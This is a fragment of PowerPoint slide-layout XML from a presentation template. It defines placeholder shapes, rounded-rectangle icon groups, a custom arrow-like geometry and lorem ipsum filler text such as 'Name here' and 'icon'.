            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> diam. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0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101309" y="385540"/>
            <a:ext cx="383999" cy="342172"/>
            <a:chOff x="5270500" y="1460500"/>
            <a:chExt cx="1701800" cy="2705100"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="Rounded Rectangle 10"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="52705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Rounded Rectangle 11"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="58928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Rounded Rectangle 12"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="65151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4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591966" y="324582"/>
            <a:ext cx="10691988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smtClean="0"/>
              <a:t>Text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591966" y="827103"/>
            <a:ext cx="10691988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4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4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4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4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image with color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6050847" y="1533748"/>
            <a:ext cx="6141156" cy="3708812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03251" y="324582"/>
            <a:ext cx="10972800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smtClean="0"/>
              <a:t>Text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03251" y="827103"/>
            <a:ext cx="10972800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2" y="1533748"/>
            <a:ext cx="6321777" cy="3708812"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4741333" h="3090677">
                <a:moveTo>
                  <a:pt x="681038" y="182378"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="554786" y="182378"/>
                  <a:pt x="452438" y="284726"/>
                  <a:pt x="452438" y="410978"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="452438" y="2658878"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="452438" y="2785130"/>
                  <a:pt x="554786" y="2887478"/>
                  <a:pt x="681038" y="2887478"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="807290" y="2887478"/>
                  <a:pt x="909638" y="2785130"/>
                  <a:pt x="909638" y="2658878"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="909638" y="410978"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="909638" y="284726"/>
                  <a:pt x="807290" y="182378"/>
                  <a:pt x="681038" y="182378"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4538133" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4538133" y="1312678"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4741333" y="1515878"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4538133" y="1719078"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4538133" y="3090677"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3090677"/>
                </a:ln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591965" y="5539546"/>
            <a:ext cx="10973505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Fusce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>diam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tortor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mattis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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dapibus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> vitae, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>euismod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> non </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>purus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. Maecenas </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> lacus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mauris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>feugiat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tristique</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> et in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>metus.is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>congue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>eros</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>lectus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> semper semper. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Nullam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>finibus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nisl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> ligula </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vestibulum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> semper ex </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>suscipit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Cras</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>fringilla</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>suscipit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>cursus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Aenean</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>accumsan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>malesuada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>hendrerit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Morbi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> sit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>amet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> dolor ante. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Duis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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viverra</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>urna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ultricies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> diam. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean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6672438" y="2259912"/>
            <a:ext cx="4893029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smtClean="0"/>
              <a:t>Text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6672438" y="2762434"/>
            <a:ext cx="4893029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>
                    <a:lumMod val="50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20" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6672438" y="3121469"/>
            <a:ext cx="4893029" cy="1572456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1080">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="9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Fusce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>diam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tortor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mattis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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dapibus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> vitae, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>euismod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> non </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>purus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. Maecenas </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> lacus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mauris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>feugiat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tristique</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> et in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>metus.is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>congue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>eros</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>lectus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> semper semper. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Nullam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>finibus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nisl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> ligula </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vestibulum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> semper ex </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>suscipit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Cras</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>fringilla</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>suscipit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>cursus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Aenean</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>accumsan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>malesuada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>hendrerit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Morbi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> sit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>amet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> dolor ante. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Duis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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viverra</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>urna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ultricies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> diam. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/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101309" y="385540"/>
            <a:ext cx="383999" cy="342172"/>
            <a:chOff x="5270500" y="1460500"/>
            <a:chExt cx="1701800" cy="2705100"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Rounded Rectangle 13"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="52705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Rounded Rectangle 14"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="58928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Rounded Rectangle 15"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="65151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1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4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4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4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" grpId="0"/>
      <p:bldP spid="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0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rvices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1" y="1965962"/>
            <a:ext cx="12192000" cy="2801723"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1">
              <a:lumMod val="95000"/>
              <a:lumOff val="5000"/>
              <a:alpha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03251" y="324582"/>
            <a:ext cx="10972800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smtClean="0"/>
              <a:t>Text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03251" y="827103"/>
            <a:ext cx="10972800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39" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1209325" y="2221083"/>
            <a:ext cx="1205083" cy="100979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 smtClean="0"/>
              <a:t>icon</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean="0"/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569386" y="3251307"/>
            <a:ext cx="2393948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920" b="1" baseline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Name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" err="1" smtClean="0"/>
              <a:t>here</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean="0"/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40" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="552454" y="3713566"/>
            <a:ext cx="2410881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08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Fusce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>diam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tortor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mattis</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/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41" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4054125" y="2221083"/>
            <a:ext cx="1205083" cy="100979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800" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent3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 smtClean="0"/>
              <a:t>icon</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean="0"/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42" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3414186" y="3251307"/>
            <a:ext cx="2393948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920" b="1" baseline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Name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" err="1" smtClean="0"/>
              <a:t>here</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean="0"/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43" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3397254" y="3713566"/>
            <a:ext cx="2410881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08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Fusce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>diam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tortor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mattis</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/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44" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6932792" y="2221083"/>
            <a:ext cx="1205083" cy="100979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800" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent4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 smtClean="0"/>
              <a:t>icon</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="45" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6292853" y="3251307"/>
            <a:ext cx="2393948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920" b="1" baseline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Name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" err="1" smtClean="0"/>
              <a:t>here</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean="0"/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46" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6275921" y="3713566"/>
            <a:ext cx="2410881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08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Fusce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>diam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tortor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mattis</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/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47" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9822044" y="2221083"/>
            <a:ext cx="1205083" cy="100979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800" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent5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 smtClean="0"/>
              <a:t>icon</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="48" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9182105" y="3251307"/>
            <a:ext cx="2393948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920" b="1" baseline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Name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" err="1" smtClean="0"/>
              <a:t>here</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
